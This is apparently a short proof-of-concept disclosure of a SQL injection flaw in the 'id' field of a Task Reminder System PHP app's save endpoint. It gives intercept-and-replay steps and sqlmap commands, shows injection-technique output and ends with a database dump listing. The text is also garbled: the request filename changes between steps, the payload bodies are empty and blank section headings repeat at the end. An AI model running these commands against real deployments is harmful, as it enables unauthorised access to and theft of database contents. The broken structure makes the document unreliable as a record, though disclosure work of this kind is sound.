Task Reminder System (save)

Details

/php-trs/classes/Users.php?f=save

Injection parameter:

MULTIPART id

POC

Intercept the request using Burpsuite Proxy.

Save the request to save.txt.

Verify vulnerability

sqlmap -r save.txt --batch

Parameter: MULTIPART id ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)
    Payload: -----------------------------358921456726172311441958711310
Content-Disposition: form-data; name="id"


    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: -----------------------------358921456726172311441958711310
Content-Disposition: form-data; name="id"

Dump databases

sqlmap -r save_reminder.txt --batch --dbs

[04:19:54] [INFO] fetching database names
[04:19:54] [INFO] retrieved: 'information_schema'
[04:19:54] [INFO] retrieved: 'trs'
available databases [2]:
[*] information_schema
[*] trs

Details​

Related Code file:​

Injection parameter:​

POC​

Verify vulnerability​

Dump databases​

Details

Related Code file:

Injection parameter:

POC

Verify vulnerability

Dump databases